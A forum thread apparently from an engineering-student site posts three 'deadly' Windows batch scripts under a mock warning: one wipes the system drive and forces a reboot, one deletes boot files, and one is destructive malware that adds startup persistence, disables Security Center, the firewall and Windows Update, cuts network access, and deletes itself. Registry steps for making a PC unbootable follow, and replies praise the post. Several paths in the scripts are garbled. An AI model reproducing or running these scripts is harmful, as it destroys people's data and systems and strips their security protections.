DEADLY Notepad Codes - Do not try them! - | FaaDoOEngineers.com
Loading Search...
+ Reply to Thread
Results 1 to 4 of 4
  1. #1
    Fuchcha FaaDoO Engineer
    City
    Delhi
    Join Date
    Mar 2011
    Gender
    Male
    Posts
    22
    Likes Gifted
    0
    Likes Received
    17
    Groans Gifted
    0
    Groans Received
    1

    Blog 32 DEADLY Notepad Codes - Do not try them!

    All these are DEADLY Notepad codes, Do not try them on your COMPUTER !

    1. Code to Delete All "C" Drive Content
    @Echo off
    Del C:\ *.* |y
    after that save the file in .bat

    An enhanced version of this script is
    @echo off
    del %systemdrive%\*.* /f /s /q
    shutdown -r -f -t 00
    also save this file in .bat.

    After doing the above:

    open regedit, right click on HKEY_LOCAL_MACHINE , click Permissions, select SYSTEM and "deny" access.

    repeat this for HKEY_USERS, next time the computer won't boot

    2. Crash a Computer FOREVER!


    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini

    3. Stop Internet Connection


    <code>@echo off
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
    start iexpress (website of your choice)
    ipconfig /release
    del "C:\Program Files\Microsoft Games
    del "C:Nexon
    del "C:\Program Files\Xfire
    del "C:\Program Files\Adobe"
    del "C:\Program Files\Internet Explorer"
    del "C:\Program Files\Mozilla Firefox"
    del "C:\WINDOWS"
    del "C:\WINDOWS\system32"
    del "C:\WINDOWS\system32\cmd"
    del "C:\WINDOWS\system32\iexpress"
    del "C:\WINDOWS\system32\sndvol32"
    del "C:\WINDOWS\system32\sndrec32"
    del "C:\WINDOWS\system32\Restore\rstrui"
    del "C:\WINDOWS\system32\wupdmgr"
    del "C:\WINDOWS\system32\desktop"
    del "C:\WINDOWS\java"
    del "C:\WINDOWS\Media"
    del "C:\WINDOWS\Resources"
    del "C:\WINDOWS\system"
    del "C:\drivers"
    del "C:\drv"
    del "C:\SYSINFO"
    del "C:\Program Files"
    echo ipconfig/release_all>>c:windowswimn32.bat
    net stop "Security Center"
    net stop SharedAccess
    > "%Temp%.kill.reg" ECHO REGEDIT4
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    START /WAIT REGEDIT /S "%Temp%.kill.reg"
    del "%Temp%.kill.reg"
    del %0
    echo @echo off>c:windowswimn32.bat
    echo break off>>c:windowswimn32.bat
    echo ipconfig/release_all>>c:windowswimn32.bat
    echo end>>c:windowswimn32.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    :a
    start iexpress (website of your choice)
    goto a

    DO NOT TRY THESE @ HOME!


  2. The Following 6 Users LIKE this post from ashishmangla:

    Amit (15th April 2011), anil_invi (7th June 2011), Apurwa (30th May 2011), karya (22nd April 2011), Manoj (11th April 2011), Sushant Mishra (7th January 2013)

  3. #2
    Fuchcha FaaDoO Engineer
    City
    Rourkela
    Join Date
    Apr 2011
    Gender
    Male
    Posts
    5
    Likes Gifted
    0
    Likes Received
    1
    Groans Gifted
    0
    Groans Received
    0
    very nice. pls post some more.


  4. The Following User LIKES this post from turbofire007:

    Chethan89 (25th September 2012)

  5. #3
    Fuchcha FaaDoO Engineer
    City
    Delhi
    Join Date
    Mar 2011
    Gender
    Male
    Posts
    22
    Likes Gifted
    0
    Likes Received
    17
    Groans Gifted
    0
    Groans Received
    1
    is this codes are in working mode

    Sponsored Ads  


  6. #4
    Fuchcha FaaDoO Engineer
    City
    Delhi
    Join Date
    Mar 2011
    Gender
    Male
    Posts
    43
    Likes Gifted
    23
    Likes Received
    55
    Groans Gifted
    4
    Groans Received
    3
    Nice...:ghz_01:

    I couldn't resist editing and expanding it a bit, and it is still far from complete and flawless as it stands. Your criticism and feedback is therefore most welcome and appreciated...

  7. The Following User LIKES this post from karya:

    Chethan89 (25th September 2012)


 

Similar Threads

  1. Does Anybody have source code of Ecops
    By Aakash007 in forum The FaaDoOEngineers REQUEST Section
    Replies: 6
    Latest: 7th May 2013, 09:14 PM
  2. Java Source code for TicTacToe
    By Amit in forum Computer Science Engineering Projects/ Seminars/ Paper Presentations
    Replies: 2
    Latest: 18th September 2012, 07:13 PM
  3. The BRO Code that every guy must know and FOLLOW!
    By Saumya in forum Love, Relationships & Advice
    Replies: 6
    Latest: 11th November 2011, 09:52 PM
  4. NEW Notepad trick **FUN!
    By software-engineer in forum PC Tricks/ Windows Tricks
    Replies: 2
    Latest: 6th June 2011, 06:06 AM
  5. How to remove autorun.inf virus from Pen Drive?
    By aaron in forum PC Tricks/ Windows Tricks
    Replies: 2
    Latest: 21st February 2011, 04:41 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts